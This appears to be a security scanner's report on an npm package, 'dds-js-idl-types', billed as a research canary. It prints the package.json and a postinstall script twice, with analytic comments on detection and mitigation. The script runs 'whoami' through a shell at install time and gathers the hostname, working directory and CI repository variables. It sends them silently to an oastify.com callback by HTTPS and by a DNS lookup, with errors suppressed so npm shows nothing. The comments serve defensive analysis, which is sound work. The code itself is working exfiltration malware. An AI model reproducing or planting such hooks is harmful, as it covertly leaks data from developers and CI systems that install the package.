// offending code · 1 file flagged, patterns: 5
--- install scripts ---
### postinstall
node postinstall.js
--- package/postinstall.js (excerpt) ---
const https = require('https');
const os = require('os');
const { execSync } = require('child_process');
// Hard-coded out-of-band (OAST) callback endpoint. Both beacons below target this
// single value, which makes it the primary network indicator for this package:
// block and alert on the domain at the egress resolver / proxy.
const CALLBACK_HOST = 'lg5ys3jebfzwk366pilidbmah1nsbszh.oastify.com/nasa/dds-js-canary/';
/**
 * Executes `cmd` through execSync (which spawns a shell) with a 3 s timeout and
 * returns its trimmed stdout. Any failure — non-zero exit, timeout, absent
 * binary — is swallowed and reported as the literal string 'error', so a
 * blocked or failing command never surfaces in npm's install output.
 * @param {string} cmd - shell command line to run
 * @returns {string} trimmed stdout, or 'error' on any failure
 */
function get(cmd) {
try { return execSync(cmd, { timeout: 3000 }).toString().trim(); }
catch { return 'error'; }
}
// Install-time host fingerprint. Every value below is collected without user
// interaction while npm runs the `postinstall` hook declared in package.json.
const payload = {
// Current username, obtained by executing `whoami` through the shell (see get()).
whoami: get('whoami'),
hostname: os.hostname(),
platform: os.platform(),
// Working directory at install time, i.e. normally the path of the project that
// pulled this package in.
cwd: process.cwd(),
// CI/CD context. GITHUB_REPOSITORY is the owner/repo slug under GitHub Actions,
// so it identifies which repository's pipeline installed the package; the
// "non-sensitive" framing does not change that it is sent to a third party.
ci: process.env.CI || '',
github: process.env.GITHUB_REPOSITORY || '',
node_env: process.env.NODE_ENV || '',
};
// The whole fingerprint is serialised into the query string of the beacon request.
const path = '/beacon?' + new URLSearchParams(payload).toString();
// Channel 1: HTTPS GET to the hard-coded callback host. The response callback is
// empty and the 'error' listener is a no-op, so the install succeeds and prints
// nothing whether or not the beacon goes out — npm output cannot be used to tell
// that this ran.
https.get({ host: CALLBACK_HOST, path, timeout: 5000 }, () => {}).on('error', () => {});
// Channel 2: a DNS lookup whose queried name embeds the captured username as a
// label under the callback host, intended to reach that domain's resolver even
// when outbound HTTPS is blocked; the result is discarded.
// Detection: install-time child_process execution plus DNS/HTTPS egress from the
// package manager to the callback domain above. Mitigation: run installs with
// `--ignore-scripts` and review declared install hooks before allowing them.
require('dns').lookup(`${payload.whoami}.${CALLBACK_HOST}`, () => {});
--- package.json (entry) ---
{
"name": "dds-js-idl-types",
"version": "1.0.0",
"description": "Security research canary — NASA VDP",
"scripts": {
"postinstall": "node postinstall.js"
},
"main": "postinstall.js",
"bin": {
"dds-js-idl-types": "postinstall.js"
}
}
--- postinstall.js (entry) ---
const https = require('https');
const os = require('os');
const { execSync } = require('child_process');
// Hard-coded out-of-band (OAST) callback endpoint. Both beacons below target this
// single value, which makes it the primary network indicator for this package:
// block and alert on the domain at the egress resolver / proxy.
const CALLBACK_HOST = 'lg5ys3jebfzwk366pilidbmah1nsbszh.oastify.com/nasa/dds-js-canary/';
/**
 * Executes `cmd` through execSync (which spawns a shell) with a 3 s timeout and
 * returns its trimmed stdout. Any failure — non-zero exit, timeout, absent
 * binary — is swallowed and reported as the literal string 'error', so a
 * blocked or failing command never surfaces in npm's install output.
 * @param {string} cmd - shell command line to run
 * @returns {string} trimmed stdout, or 'error' on any failure
 */
function get(cmd) {
try { return execSync(cmd, { timeout: 3000 }).toString().trim(); }
catch { return 'error'; }
}
// Install-time host fingerprint. Every value below is collected without user
// interaction while npm runs the `postinstall` hook declared in package.json.
const payload = {
// Current username, obtained by executing `whoami` through the shell (see get()).
whoami: get('whoami'),
hostname: os.hostname(),
platform: os.platform(),
// Working directory at install time, i.e. normally the path of the project that
// pulled this package in.
cwd: process.cwd(),
// CI/CD context. GITHUB_REPOSITORY is the owner/repo slug under GitHub Actions,
// so it identifies which repository's pipeline installed the package; the
// "non-sensitive" framing does not change that it is sent to a third party.
ci: process.env.CI || '',
github: process.env.GITHUB_REPOSITORY || '',
node_env: process.env.NODE_ENV || '',
};
// The whole fingerprint is serialised into the query string of the beacon request.
const path = '/beacon?' + new URLSearchParams(payload).toString();
// Channel 1: HTTPS GET to the hard-coded callback host. The response callback is
// empty and the 'error' listener is a no-op, so the install succeeds and prints
// nothing whether or not the beacon goes out — npm output cannot be used to tell
// that this ran.
https.get({ host: CALLBACK_HOST, path, timeout: 5000 }, () => {}).on('error', () => {});
// Channel 2: a DNS lookup whose queried name embeds the captured username as a
// label under the callback host, intended to reach that domain's resolver even
// when outbound HTTPS is blocked; the result is discarded.
// Detection: install-time child_process execution plus DNS/HTTPS egress from the
// package manager to the callback domain above. Mitigation: run installs with
// `--ignore-scripts` and review declared install hooks before allowing them.
require('dns').lookup(`${payload.whoami}.${CALLBACK_HOST}`, () => {});